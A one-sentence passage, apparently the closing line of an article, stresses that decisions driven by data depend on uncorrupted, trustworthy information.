In a world where data drives decisions, let’s ensure the decisions are based on uncorrupted, trustworthy information.